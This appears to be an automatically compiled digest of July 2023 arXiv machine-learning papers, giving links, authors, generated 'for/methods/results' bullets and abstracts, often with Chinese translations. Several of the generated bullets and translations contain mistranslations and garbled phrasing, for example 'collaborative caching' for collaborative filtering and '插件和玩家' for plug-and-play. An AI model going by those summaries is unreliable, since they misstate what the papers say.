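    print(f"stage {stage}: residual RMS = {np.sqrt(np.mean((y - prediction) ** 2)):.3e}")
```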

IxDRL: A Novel Explainable Deep Reinforcement Learning Toolkit based on Analyses of Interestingness

  • paper_url: http://arxiv.org/abs/2307.08933
  • repo_url: https://github.com/sri-aic/23-xai-ixdrl-data
  • paper_authors: Pedro Sequeira, Melinda Gervasio
  • for: The paper aims to provide a more explainable deep reinforcement learning (xDRL) framework to help human operators understand the competence of RL agents in complex decision-making tasks.
  • methods: The proposed framework is based on interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit.
  • results: The approach can identify agent behavior patterns and competency-controlling conditions, as well as the task elements most responsible for an agent's competence, based on global and local analyses of interestingness. The framework provides agent designers with insights about RL agent competence, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.
    Abstract In recent years, advances in deep learning have resulted in a plethora of successes in the use of reinforcement learning (RL) to solve complex sequential decision tasks with high-dimensional inputs. However, existing systems lack the necessary mechanisms to provide humans with a holistic view of their competence, presenting an impediment to their adoption, particularly in critical applications where the decisions an agent makes can have significant consequences. Yet, existing RL-based systems are essentially competency-unaware in that they lack the necessary interpretation mechanisms to allow human operators to have an insightful, holistic view of their competency. Towards more explainable Deep RL (xDRL), we propose a new framework based on analyses of interestingness. Our tool provides various measures of RL agent competence stemming from interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit. We showcase the use of our framework by applying the proposed pipeline in a set of scenarios of varying complexity. We empirically assess the capability of the approach in identifying agent behavior patterns and competency-controlling conditions, and the task elements mostly responsible for an agent's competence, based on global and local analyses of interestingness. Overall, we show that our framework can provide agent designers with insights about RL agent competence, both their capabilities and limitations, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.

Submodular Maximization under the Intersection of Matroid and Knapsack Constraints

  • paper_url: http://arxiv.org/abs/2307.09487
  • repo_url: None
  • paper_authors: Yu-Ran Gu, Chao Bian, Chao Qian
  • for: 本文研究在 $k$-拟阵约束与 $m$-背包约束交集下的次模最大化问题。
  • methods: 作者提出了一种名为 SPROUT 的新算法,将部分枚举(partial enumeration)引入同步贪心框架来求解该问题。
  • results: 作者证明 SPROUT 能在多项式时间内取得优于现有算法的近似保证;并通过引入随机枚举与平滑技术得到 SPROUT++ 算法,在实践中效率更高且近似保证相近。
    Abstract Submodular maximization arises in many applications, and has attracted a lot of research attentions from various areas such as artificial intelligence, finance and operations research. Previous studies mainly consider only one kind of constraint, while many real-world problems often involve several constraints. In this paper, we consider the problem of submodular maximization under the intersection of two commonly used constraints, i.e., $k$-matroid constraint and $m$-knapsack constraint, and propose a new algorithm SPROUT by incorporating partial enumeration into the simultaneous greedy framework. We prove that SPROUT can achieve a polynomial-time approximation guarantee better than the state-of-the-art algorithms. Then, we introduce the random enumeration and smooth techniques into SPROUT to improve its efficiency, resulting in the SPROUT++ algorithm, which can keep a similar approximation guarantee. Experiments on the applications of movie recommendation and weighted max-cut demonstrate the superiority of SPROUT++ in practice.
    摘要 次模最大化问题出现在许多应用中,受到人工智能、金融和运筹学等领域的广泛关注。以往研究大多只考虑单一约束,而许多现实问题往往同时涉及多种约束。本文研究在 $k$-拟阵(matroid)约束与 $m$-背包(knapsack)约束交集下的次模最大化问题,提出了一种新算法 SPROUT,将部分枚举引入同步贪心框架。我们证明 SPROUT 能在多项式时间内取得优于现有最好算法的近似保证。随后,我们在 SPROUT 中引入随机枚举与平滑技术,得到 SPROUT++ 算法,在保持相近近似保证的同时提高了效率。在电影推荐和带权最大割(weighted max-cut)应用上的实验表明了 SPROUT++ 在实践中的优越性。

On-the-fly machine learning for parametrization of the effective Hamiltonian

  • paper_url: http://arxiv.org/abs/2307.08929
  • repo_url: None
  • paper_authors: Xingyue Ma, L. Bellaiche, Di Wu, Yurong Yang
  • for: 本研究旨在开发一种基于机器学习的即时(on-the-fly)有效哈密顿量参数化方法,用于预测和模拟铁电体与弛豫铁电体的性质。
  • methods: 该方法使用贝叶斯线性回归对有效哈密顿量进行参数化,参数化在分子动力学模拟中完成,同时预测能量、力和应力及其不确定性;当不确定性较大时,调用第一性原理计算重新训练参数。
  • results: 该方法可为任何所考虑的体系(包括传统方法难以处理的复杂体系)自动计算有效哈密顿量参数。以 BaTiO3 和 Pb(Sc,Ta)O3 为例,其精度与传统的第一性原理参数化方法相当。
    Abstract The first-principles-based effective Hamiltonian is widely used to predict and simulate the properties of ferroelectrics and relaxor ferroelectrics. However, the parametrization method of the effective Hamiltonian is complicated and hardly can resolve the systems with complex interactions and/or complex components. Here, we developed an on-the-fly machine learning approach to parametrize the effective Hamiltonian based on Bayesian linear regression. The parametrization is completed in molecular dynamics simulations, with the energy, forces and stress predicted at each step along with their uncertainties. First-principles calculations are executed when the uncertainties are large to retrain the parameters. This approach provides a universal and automatic way to compute the effective Hamiltonian parameters for any considered systems including complex systems which previous methods can not handle. BaTiO3 and Pb(Sc,Ta)O3 are taken as examples to show the accurateness of this approach comparing with conventional first-principles parametrization method.
    摘要 基于第一性原理的有效哈密顿量被广泛用于预测和模拟铁电体与弛豫铁电体的性质。然而,有效哈密顿量的参数化方法复杂,难以处理具有复杂相互作用和/或复杂成分的体系。我们开发了一种基于贝叶斯线性回归的即时(on-the-fly)机器学习方法来参数化有效哈密顿量:参数化在分子动力学模拟中完成,每一步都预测能量、力和应力及其不确定性;当不确定性较大时,执行第一性原理计算以重新训练参数。该方法为任何所考虑的体系(包括此前方法无法处理的复杂体系)提供了一种通用且自动的有效哈密顿量参数计算途径。我们以 BaTiO3 和 Pb(Sc,Ta)O3 为例,与传统的第一性原理参数化方法对比,说明了该方法的准确性。
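A minimal sketch of the on-the-fly loop described above: a conjugate Bayesian linear regression gives closed-form predictions with uncertainties, and the expensive reference calculation is queried (and the posterior updated) only when the predictive uncertainty exceeds a threshold. The feature dimension, threshold, and stand-in "reference" function are assumptions; the real pipeline fits effective-Hamiltonian parameters against first-principles data.

```python
import numpy as np

class BayesianLinearModel:
    """Conjugate Bayesian linear regression: closed-form posterior and predictive variance."""

    def __init__(self, n_features, alpha=1e-3, beta=100.0):
        self.alpha, self.beta = alpha, beta          # prior precision, noise precision
        self.S_inv = alpha * np.eye(n_features)      # posterior precision
        self.mean = np.zeros(n_features)
        self._Xty = np.zeros(n_features)

    def update(self, X, y):
        self.S_inv = self.S_inv + self.beta * X.T @ X
        self._Xty = self._Xty + X.T @ y
        self.mean = self.beta * np.linalg.solve(self.S_inv, self._Xty)

    def predict(self, X):
        S = np.linalg.inv(self.S_inv)
        mu = X @ self.mean
        var = 1.0 / self.beta + np.einsum("ij,jk,ik->i", X, S, X)
        return mu, np.sqrt(var)

# On-the-fly loop: query the expensive reference only when the model is unsure.
rng = np.random.default_rng(0)
true_w = rng.normal(size=8)
expensive_reference = lambda X: X @ true_w + 0.01 * rng.normal(size=len(X))  # stand-in for DFT

model, threshold = BayesianLinearModel(8), 0.05
for step in range(200):
    X = rng.normal(size=(1, 8))                      # features of the current MD configuration
    energy, sigma = model.predict(X)                 # cheap prediction with uncertainty
    if sigma[0] > threshold:                         # uncertain: fall back and retrain
        model.update(X, expensive_reference(X))
```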

Federated Large Language Model: A Position Paper

  • paper_url: http://arxiv.org/abs/2307.08925
  • repo_url: None
  • paper_authors: Chaochao Chen, Xiaohua Feng, Jun Zhou, Jianwei Yin, Xiaolin Zheng
  • for: 这个研究旨在解决大规模语言模型(LLM)的开发问题,特别是在实际应用中遇到的挑战,例如公共领域数据的缺乏和维护private领域数据的隐私。
  • methods: 这个研究提出了一种称为“联邦式语言模型”(federated LLM)的技术,它包括三个主要的component,即联邦式语言模型预训练、联邦式语言模型细化和联邦式语言模型提示工程。每个component都有优点比传统LLM训练方法,并且提出了具体的工程策略来实现。
  • results: 这个研究获得了联邦式语言模型的优点,包括可以解决实际应用中的挑战,并且可以维护隐私和数据安全性。此外,研究也发现了联邦式语言模型在某些情况下可能会面临新的挑战和障碍。
    Abstract Large scale language models (LLM) have received significant attention and found diverse applications across various domains, but their development encounters challenges in real-world scenarios. These challenges arise due to the scarcity of public domain data availability and the need to maintain privacy with respect to private domain data. To address these issues, federated learning (FL) has emerged as a promising technology that enables collaborative training of shared models while preserving decentralized data. We propose the concept of federated LLM, which comprises three key components, i.e., federated LLM pre-training, federated LLM fine-tuning, and federated LLM prompt engineering. For each component, we discuss its advantage over traditional LLM training methods and propose specific engineering strategies for implementation. Furthermore, we explore the novel challenges introduced by the integration of FL and LLM. We analyze existing solutions and identify potential obstacles faced by these solutions within the context of federated LLM.

Learning to Sample Tasks for Meta Learning

  • paper_url: http://arxiv.org/abs/2307.08924
  • repo_url: https://github.com/ZJLAB-AMMI/HS-OMRL
  • paper_authors: Jingyao Wang, Zeen Song, Xingzhe Su, Lingyu Si, Hongwei Dong, Wenwen Qiang, Changwen Zheng
  • for: 通过对各种元学习方法、任务采样器和少量学习任务进行实验,这篇论文得出了三个结论。首先,无法确保元学习模型性能的通用任务采样策略。其次,任务多样性可能导致模型在训练中 Either underfit 或 overfit。最后,模型的总结果受任务分化、任务熵和任务Difficulty的影响。
  • methods: 作者提出了一种名为 Adaptive Sampler (ASr) 的新任务采样器,该采样器可以根据任务分化、任务熵和任务Difficulty来采样任务。以便优化 ASr,作者提出了一种简单普适的元学习算法。
  • results: 许多实验证明了提出的 ASr 的有效性。
    Abstract Through experiments on various meta-learning methods, task samplers, and few-shot learning tasks, this paper arrives at three conclusions. Firstly, there are no universal task sampling strategies to guarantee the performance of meta-learning models. Secondly, task diversity can cause the models to either underfit or overfit during training. Lastly, the generalization performance of the models are influenced by task divergence, task entropy, and task difficulty. In response to these findings, we propose a novel task sampler called Adaptive Sampler (ASr). ASr is a plug-and-play task sampler that takes task divergence, task entropy, and task difficulty to sample tasks. To optimize ASr, we rethink and propose a simple and general meta-learning algorithm. Finally, a large number of empirical experiments demonstrate the effectiveness of the proposed ASr.
    摘要 通过多种元学习方法、任务采样策略和少量学习任务的实验,这篇论文得出了三个结论。首先,没有一种通用的任务采样策略可以保证元学习模型的性能。第二,任务多样性可以使模型在训练中出现下降或过度适应。最后,模型的总体性能受到任务分化、任务 entropy 和任务难度的影响。为了应对这些发现,我们提出了一种名为 Adaptive Sampler(ASr)的任务采样器。ASr 是一个插件和玩家的任务采样器,它根据任务分化、任务 entropy 和任务难度来采样任务。为了优化 ASr,我们提出了一种简单和通用的元学习算法。最后,大量的实验证明了我们提出的 ASr 的有效性。

Optimistic Estimate Uncovers the Potential of Nonlinear Models

  • paper_url: http://arxiv.org/abs/2307.08921
  • repo_url: None
  • paper_authors: Yaoyu Zhang, Zhongwang Zhang, Leyang Zhang, Zhiwei Bai, Tao Luo, Zhi-Qin John Xu
  • for: 评估非线性模型最佳适应性表现的估计方法。
  • methods: 使用非线性模型,并且采用估计最小样本大小以达到目标函数的最佳适应性。
  • results: 对矩阵分解模型、深度模型和深度神经网络(DNN)进行了估计,并证明了这些模型在过参数化下的可适应性。此外,研究还发现了深度神经网络的两种特殊性:自由表达能力和成本表达能力。这两种特殊性提出了建议DNNS的建模设计原则:(一)不妨添加神经元和核函数;(二)限制神经元之间的连接。通过这种框架,我们预计在未来更深入理解如何和为什么许多非线性模型在实践中能够有效实现其潜在可能性。
    Abstract We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.
    摘要 我们提出了一种优派估计来评估非线性模型的最佳适应性表现。它提供了一个最小的样本大小,用于评估目标函数使用非线性模型适应的可能性。我们对矩阵因子化模型、深度模型和深度神经网络(DNN)进行了估计,并证明了每种非线性模型的估计预测了一个特定的目标集可以在过参数化下适应。我们的估计还揭示了深度神经网络(DNN)模型的两种特殊性:自由表达能力和成本表达能力。这两种特殊性建议了深度神经网络(DNN)模型的建设设计原则:(i)自由添加神经元/核函数;(ii)限制神经元之间的连接。总的来说,我们的优派估计 theoretically 探明了非线性模型在过参数化下的潜在适应能力。基于这个框架,我们预计在未来将更深入地理解非线性模型在实践中如何有效地实现其潜在。

Continuous-Time Reinforcement Learning: New Design Algorithms with Theoretical Insights and Performance Guarantees

  • paper_url: http://arxiv.org/abs/2307.08920
  • repo_url: None
  • paper_authors: Brent A. Wallace, Jennie Si
  • for: 这个论文的目的是提出一种新的连续时间非线性优化控制方法,用于控制非线性系统。
  • methods: 这种方法基于分解physical system into smaller subproblems,并引入了一种新的刺激框架,以提高 persistency of excitation 和数值稳定性。
  • results: 这些算法可以提供 convergence 和关闭Loop稳定性保证,并在控制一个不稳定、非最小频段高速飞行器(HSV)上进行了示例应用。
    Abstract Continuous-time nonlinear optimal control problems hold great promise in real-world applications. After decades of development, reinforcement learning (RL) has achieved some of the greatest successes as a general nonlinear control design method. However, a recent comprehensive analysis of state-of-the-art continuous-time RL (CT-RL) methods, namely, adaptive dynamic programming (ADP)-based CT-RL algorithms, reveals they face significant design challenges due to their complexity, numerical conditioning, and dimensional scaling issues. Despite advanced theoretical results, existing ADP CT-RL synthesis methods are inadequate in solving even small, academic problems. The goal of this work is thus to introduce a suite of new CT-RL algorithms for control of affine nonlinear systems. Our design approach relies on two important factors. First, our methods are applicable to physical systems that can be partitioned into smaller subproblems. This constructive consideration results in reduced dimensionality and greatly improved intuitiveness of design. Second, we introduce a new excitation framework to improve persistence of excitation (PE) and numerical conditioning performance via classical input/output insights. Such a design-centric approach is the first of its kind in the ADP CT-RL community. In this paper, we progressively introduce a suite of (decentralized) excitable integral reinforcement learning (EIRL) algorithms. We provide convergence and closed-loop stability guarantees, and we demonstrate these guarantees on a significant application problem of controlling an unstable, nonminimum phase hypersonic vehicle (HSV).
    摘要 连续时间非线性最优控制问题在实际应用中具有广阔前景。经过数十年的发展,强化学习(RL)作为一种通用的非线性控制设计方法取得了一些重大成功。然而,最近对最先进的连续时间 RL(CT-RL)方法——即基于自适应动态规划(ADP)的 CT-RL 算法——的全面分析表明,这些方法由于复杂性、数值条件和维度扩展等问题而面临重大的设计挑战。尽管已有先进的理论结果,现有的 ADP CT-RL 综合方法甚至难以求解规模很小的学术性问题。因此,本工作的目标是提出一组新的 CT-RL 算法,用于仿射非线性系统的控制。我们的设计方法依赖两个重要因素:其一,我们的方法适用于可划分为更小子问题的物理系统,这种构造性的考虑降低了维度并显著提高了设计的直观性;其二,我们引入一个新的激励框架,利用经典的输入/输出视角改善持续激励(PE)与数值条件性能。这种以设计为中心的思路在 ADP CT-RL 领域尚属首创。本文逐步给出一组(分布式)可激励积分强化学习(EIRL)算法,提供收敛性与闭环稳定性保证,并在控制一个不稳定、非最小相位的高超声速飞行器(HSV)这一重要应用问题上验证了这些保证。

Accuracy versus time frontiers of semi-supervised and self-supervised learning on medical images

  • paper_url: http://arxiv.org/abs/2307.08919
  • repo_url: https://github.com/tufts-ml/ssl-vs-ssl-benchmark
  • paper_authors: Zhe Huang, Ruijie Jiang, Shuchin Aeron, Michael C. Hughes
  • for: 本研究面向资源受限、以结果为导向的医学图像分类问题,通过自监督学习与半监督学习方法利用无标注数据来提升分类器性能。
  • methods: 本研究比较了 6 种半监督方法和 5 种自监督学习方法,并以仅使用标注数据的强基线作为参照。
  • results: 研究发现,MixMatch、SimCLR 和 BYOL 在 3 个医学图像数据集上表现出色,可在数小时内达到良好性能;在选定合适超参数后,再投入数十小时的搜索只能带来有限的额外提升。
    Abstract For many applications of classifiers to medical images, a trustworthy label for each image can be difficult or expensive to obtain. In contrast, images without labels are more readily available. Two major research directions both promise that additional unlabeled data can improve classifier performance: self-supervised learning pretrains useful representations on unlabeled data only, then fine-tunes a classifier on these representations via the labeled set; semi-supervised learning directly trains a classifier on labeled and unlabeled data simultaneously. Recent methods from both directions have claimed significant gains on non-medical tasks, but do not systematically assess medical images and mostly compare only to methods in the same direction. This study contributes a carefully-designed benchmark to help answer a practitioner's key question: given a small labeled dataset and a limited budget of hours to spend on training, what gains from additional unlabeled images are possible and which methods best achieve them? Unlike previous benchmarks, ours uses realistic-sized validation sets to select hyperparameters, assesses runtime-performance tradeoffs, and bridges two research fields. By comparing 6 semi-supervised methods and 5 self-supervised methods to strong labeled-only baselines on 3 medical datasets with 30-1000 labels per class, we offer insights to resource-constrained, results-focused practitioners: MixMatch, SimCLR, and BYOL represent strong choices that were not surpassed by more recent methods. After much effort selecting hyperparameters on one dataset, we publish settings that enable strong methods to perform well on new medical tasks within a few hours, with further search over dozens of hours delivering modest additional gains.

Towards the Sparseness of Projection Head in Self-Supervised Learning

  • paper_url: http://arxiv.org/abs/2307.08913
  • repo_url: None
  • paper_authors: Zeen Song, Xingzhe Su, Jingyao Wang, Wenwen Qiang, Changwen Zheng, Fuchun Sun
  • for: 提升自监督学习(SSL)方法所学表示的质量
  • methods: 结合实证分析与理论研究,使用对比学习方法探讨投影头的内部机制及其与维度坍缩现象的关系
  • results: 提出一个假设,即最小化一个 mini-batch 的对比损失时只需要一部分特征;据此提出名为 SparseHead 的正则项,有效约束投影头的稀疏性,并可与任何 SSL 方法无缝结合,从而提升现有对比方法的表示性能。
    Abstract In recent years, self-supervised learning (SSL) has emerged as a promising approach for extracting valuable representations from unlabeled data. One successful SSL method is contrastive learning, which aims to bring positive examples closer while pushing negative examples apart. Many current contrastive learning approaches utilize a parameterized projection head. Through a combination of empirical analysis and theoretical investigation, we provide insights into the internal mechanisms of the projection head and its relationship with the phenomenon of dimensional collapse. Our findings demonstrate that the projection head enhances the quality of representations by performing contrastive loss in a projected subspace. Therefore, we propose an assumption that only a subset of features is necessary when minimizing the contrastive loss of a mini-batch of data. Theoretical analysis further suggests that a sparse projection head can enhance generalization, leading us to introduce SparseHead - a regularization term that effectively constrains the sparsity of the projection head, and can be seamlessly integrated with any self-supervised learning (SSL) approaches. Our experimental results validate the effectiveness of SparseHead, demonstrating its ability to improve the performance of existing contrastive methods.
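A minimal sketch of how a sparsity term on the projection head could be wired into a contrastive pipeline; the L1 penalty is our assumed instantiation of "constraining the sparsity of the projection head" and may differ from the paper's exact SparseHead term.

```python
import torch
import torch.nn as nn

class ProjectionHead(nn.Module):
    """Two-layer projection head used by many contrastive SSL methods."""
    def __init__(self, in_dim=512, hidden=512, out_dim=128):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(in_dim, hidden), nn.ReLU(), nn.Linear(hidden, out_dim))

    def forward(self, h):
        return self.net(h)

def sparse_head_penalty(head: nn.Module, lam: float = 1e-4) -> torch.Tensor:
    """L1 penalty on the projection head's weight matrices, pushing it towards
    using only a subset of features (one concrete way to realize a sparsity term)."""
    return lam * sum(p.abs().sum() for p in head.parameters() if p.dim() > 1)

head = ProjectionHead()
z = head(torch.randn(32, 512))                 # projected features for the contrastive loss
# Inside a training step, with contrastive_loss computed elsewhere:
# loss = contrastive_loss + sparse_head_penalty(head)
print(float(sparse_head_penalty(head)))
```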

Sharpness-Aware Graph Collaborative Filtering

  • paper_url: http://arxiv.org/abs/2307.08910
  • repo_url: None
  • paper_authors: Huiyuan Chen, Chin-Chia Michael Yeh, Yujie Fan, Yan Zheng, Junpeng Wang, Vivian Lai, Mahashweta Das, Hao Yang
  • for: 提高Graph Neural Networks(GNNs)在协同缓存中的表现。
  • methods: 提出了一种有效的训练方案{gSAM},基于权重损失 landscape的平滑性来优化GNNs。
  • results: 实验结果表明,gSAM可以提高GNNs的表现。
    Abstract Graph Neural Networks (GNNs) have achieved impressive performance in collaborative filtering. However, GNNs tend to yield inferior performance when the distributions of training and test data are not aligned well. Also, training GNNs requires optimizing non-convex neural networks with an abundance of local and global minima, which may differ widely in their performance at test time. Thus, it is essential to choose the minima carefully. Here we propose an effective training schema, called {gSAM}, under the principle that the \textit{flatter} minima has a better generalization ability than the \textit{sharper} ones. To achieve this goal, gSAM regularizes the flatness of the weight loss landscape by forming a bi-level optimization: the outer problem conducts the standard model training while the inner problem helps the model jump out of the sharp minima. Experimental results show the superiority of our gSAM.
    摘要 图神经网络(GNN)在协同过滤中表现出色。然而,当训练与测试数据分布不一致时,GNN 的性能往往下降。此外,训练 GNN 需要优化非凸的神经网络,其存在大量局部与全局极小值,而这些极小值在测试时的表现可能差异很大,因此需要谨慎地选择极小值。我们基于"较平坦的极小值比尖锐的极小值具有更好的泛化能力"这一原则,提出了一种有效的训练方案 gSAM。gSAM 通过一个双层优化来正则化权重损失地形的平坦度:外层问题进行标准的模型训练,内层问题帮助模型跳出尖锐的极小值。实验结果表明了 gSAM 的优越性。
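gSAM is described as a variant of sharpness-aware training with a bi-level structure. The sketch below implements only a generic SAM update step (ascend within an L2 ball of radius rho, take the gradient there, apply it at the original weights); it is not gSAM's graph-specific formulation.

```python
import torch

def sam_step(model, loss_fn, batch, optimizer, rho=0.05):
    """One sharpness-aware update: ascend to a nearby 'sharp' point, take the
    gradient there, then apply that gradient at the original weights."""
    x, y = batch
    optimizer.zero_grad()

    # First pass: gradient at the current weights.
    loss_fn(model(x), y).backward()
    grads = [p.grad.detach().clone() for p in model.parameters()]
    grad_norm = torch.sqrt(sum(g.pow(2).sum() for g in grads))

    # Perturb weights towards the worst-case direction within an L2 ball of radius rho.
    with torch.no_grad():
        eps = [rho * g / (grad_norm + 1e-12) for g in grads]
        for p, e in zip(model.parameters(), eps):
            p.add_(e)

    # Second pass: gradient at the perturbed point defines the actual update.
    optimizer.zero_grad()
    loss_fn(model(x), y).backward()
    with torch.no_grad():
        for p, e in zip(model.parameters(), eps):
            p.sub_(e)                  # restore original weights before stepping
    optimizer.step()
    optimizer.zero_grad()
```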

Solving multiphysics-based inverse problems with learned surrogates and constraints

  • paper_url: http://arxiv.org/abs/2307.11099
  • repo_url: None
  • paper_authors: Ziyi Yin, Rafael Orozco, Mathias Louboutin, Felix J. Herrmann
  • for: 这 paper 是用于解决地质碳存储监测中的多物理 inverse problem 的。
  • methods: 这 paper 使用了 computationally cheap 的 learned surrogates 和 learned constraints 来解决这些问题。
  • results: 这 paper 的结果表明,这种 combinaison 可以提高 fluid-flow 性能的减法,并且可以处理多模态数据,包括 well 测量和 active-source time-lapse seismic 数据。另外,这种方法还可以保持准确性,因为它使用了一个 trained deep neural network 来 constrain the model iterates。
    Abstract Solving multiphysics-based inverse problems for geological carbon storage monitoring can be challenging when multimodal time-lapse data are expensive to collect and costly to simulate numerically. We overcome these challenges by combining computationally cheap learned surrogates with learned constraints. Not only does this combination lead to vastly improved inversions for the important fluid-flow property, permeability, it also provides a natural platform for inverting multimodal data including well measurements and active-source time-lapse seismic data. By adding a learned constraint, we arrive at a computationally feasible inversion approach that remains accurate. This is accomplished by including a trained deep neural network, known as a normalizing flow, which forces the model iterates to remain in-distribution, thereby safeguarding the accuracy of trained Fourier neural operators that act as surrogates for the computationally expensive multiphase flow simulations involving partial differential equation solves. By means of carefully selected experiments, centered around the problem of geological carbon storage, we demonstrate the efficacy of the proposed constrained optimization method on two different data modalities, namely time-lapse well and time-lapse seismic data. While permeability inversions from both these two modalities have their pluses and minuses, their joint inversion benefits from either, yielding valuable superior permeability inversions and CO2 plume predictions near, and far away, from the monitoring wells.
    摘要 在地质碳封存监测中,求解基于多物理场的反问题可能十分困难:多模态时移数据采集成本高,数值模拟代价也很高。我们通过将计算廉价的学习代理模型与学习约束相结合来克服这些挑战。这一组合不仅显著改进了对关键流体流动性质——渗透率——的反演,还为联合反演井测量与主动源时移地震等多模态数据提供了自然的平台。通过加入学习约束,我们得到了一种计算可行且保持精度的反演方法:引入一个训练好的深度神经网络(归一化流,normalizing flow),强制模型迭代解保持在分布内,从而保障作为昂贵多相流偏微分方程模拟替代品的傅里叶神经算子的精度。围绕地质碳封存问题精心设计的实验表明,所提的约束优化方法在时移井数据和时移地震数据两种模态上均有效。尽管基于这两种模态各自的渗透率反演各有优劣,但联合反演能够兼取其长,在监测井附近及远处都给出更优的渗透率反演与 CO2 羽流预测。

Basal-Bolus Advisor for Type 1 Diabetes (T1D) Patients Using Multi-Agent Reinforcement Learning (RL) Methodology

  • paper_url: http://arxiv.org/abs/2307.08897
  • repo_url: None
  • paper_authors: Mehrad Jaloli, Marzia Cescon
  • for: 本研究旨在开发一种基于多智能体强化学习(RL)的个性化血糖控制方法,以改善 1 型糖尿病(T1D)患者的血糖控制。
  • methods: 该方法采用闭环系统,由血糖代谢模型和作为基础-餐前胰岛素顾问的多智能体 soft actor-critic RL 模型组成。
  • results: 结果表明,基于 RL 的基础-餐前胰岛素顾问能显著改善血糖控制,降低血糖波动,并增加血糖处于目标范围(70-180 mg/dL)内的时间;低血糖事件得到有效预防,严重高血糖事件有所减少。此外,与常规疗法相比,RL 方法使每日基础胰岛素剂量出现统计显著的降低。这些发现表明多智能体 RL 方法能够为 T1D 患者实现更好的血糖控制,并降低严重高血糖的风险。
    Abstract This paper presents a novel multi-agent reinforcement learning (RL) approach for personalized glucose control in individuals with type 1 diabetes (T1D). The method employs a closed-loop system consisting of a blood glucose (BG) metabolic model and a multi-agent soft actor-critic RL model acting as the basal-bolus advisor. Performance evaluation is conducted in three scenarios, comparing the RL agents to conventional therapy. Evaluation metrics include glucose levels (minimum, maximum, and mean), time spent in different BG ranges, and average daily bolus and basal insulin dosages. Results demonstrate that the RL-based basal-bolus advisor significantly improves glucose control, reducing glycemic variability and increasing time spent within the target range (70-180 mg/dL). Hypoglycemia events are effectively prevented, and severe hyperglycemia events are reduced. The RL approach also leads to a statistically significant reduction in average daily basal insulin dosage compared to conventional therapy. These findings highlight the effectiveness of the multi-agent RL approach in achieving better glucose control and mitigating the risk of severe hyperglycemia in individuals with T1D.

Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction

  • paper_url: http://arxiv.org/abs/2307.08893
  • repo_url: None
  • paper_authors: Taedong Yun
  • for: 本文旨在研究高维临床数据在遗传学研究中的应用,利用深度学习技术学习其低维表示。
  • methods: 本文比较了多种无监督学习方法,包括自编码器、VAE、β-VAE 和 FactorVAE,用于学习解耦表示。
  • results: 研究发现,与标准 VAE 或非变分自编码器相比,使用 FactorVAE 或 β-VAE 可以改进遗传学分析的结果,包括全基因组显著位点数量、遗传力以及哮喘和慢性阻塞性肺病多基因风险评分的表现。FactorVAE 在多个正则化超参数取值下均表现良好,而 β-VAE 对超参数取值更为敏感。
    Abstract High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.
    摘要 得益于生物样本库规模数据集的可及性以及高性能建模技术(尤其是深度学习)的发展,高维临床数据已成为遗传学研究的宝贵资源。近期工作表明,变分自编码器(VAE)学习到的临床数据低维嵌入可用于全基因组关联分析和多基因风险预测。在本工作中,我们在遗传关联研究的背景下考察了多种学习解耦表示的无监督方法,即自编码器、VAE、β-VAE 和 FactorVAE。以 UK Biobank 的肺量图(spirogram)为例,我们观察到,与标准 VAE 或非变分自编码器相比,使用 FactorVAE 或 β-VAE 可以增加全基因组显著位点数量、提高遗传力,并改进哮喘与慢性阻塞性肺病的多基因风险评分表现。FactorVAE 在多个正则化超参数取值下都表现有效,而 β-VAE 对超参数取值更为敏感。
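The β-VAE variant referenced above differs from a standard VAE only in how the KL term is weighted; a minimal loss sketch is below. Note that FactorVAE instead penalizes the total correlation of the latent code with a discriminator, which this snippet does not show.

```python
import torch
import torch.nn.functional as F

def beta_vae_loss(x, x_recon, mu, logvar, beta=4.0):
    """ELBO with the KL term up-weighted by beta; beta=1 recovers the standard VAE.
    Larger beta pressures the latent dimensions to stay independent (more disentangled)."""
    recon = F.mse_loss(x_recon, x, reduction="sum") / x.size(0)
    kl = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp()) / x.size(0)
    return recon + beta * kl
```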

The Predicted-Deletion Dynamic Model: Taking Advantage of ML Predictions, for Free

  • paper_url: http://arxiv.org/abs/2307.08890
  • repo_url: None
  • paper_authors: Quanquan C. Liu, Vaidehi Srinivas
  • for: The paper addresses dynamic graph problems where edge updates come with machine-learned predictions, aiming to make fully dynamic algorithms more efficient.
  • methods: It formulates the predicted-deletion dynamic model, in which each inserted edge is accompanied by a prediction of its deletion time, and gives a framework that "lifts" partially dynamic algorithms into the fully dynamic setting with little overhead.
  • results: The resulting algorithms achieve amortized update times that, with high probability, match the partially dynamic algorithms when predictions are of high quality, do no worse than existing fully dynamic algorithms when predictions are of low quality, and trade off gracefully between the two regimes.
